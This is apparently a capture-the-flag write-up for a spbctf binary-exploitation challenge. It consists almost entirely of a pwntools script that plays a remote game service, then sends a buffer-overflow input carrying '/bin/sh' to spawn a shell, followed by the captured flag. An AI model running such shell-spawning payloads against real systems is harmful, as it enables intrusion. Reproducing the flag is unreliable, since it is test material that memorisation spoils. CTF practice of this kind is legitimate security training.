Tags: binary-exploitation bufferoverflow pwn 

Rating:

```
from pwn import *
while True:
try:
nc = remote('109.233.57.95', 20202)
i = 1
while True:
s = nc.recv().decode()
print(s)
s = nc.recv().decode()
print(s)
if '(x y)?' in s:
nc.sendline('1 ' + str(i))
i += 1
else:
break
nc.sendline('3')
nc.sendlineafter('? ', '3 AAAAAAA/bin/sh\x00')
nc.sendline('flag')
nc.interactive()
break
except:
continue
```
![](https://i.ibb.co/zss271W/Screenshot-1.jpg)
```
spbctf{OxOxO_N0w_y0u_REALLY_h4ve_w0n}
```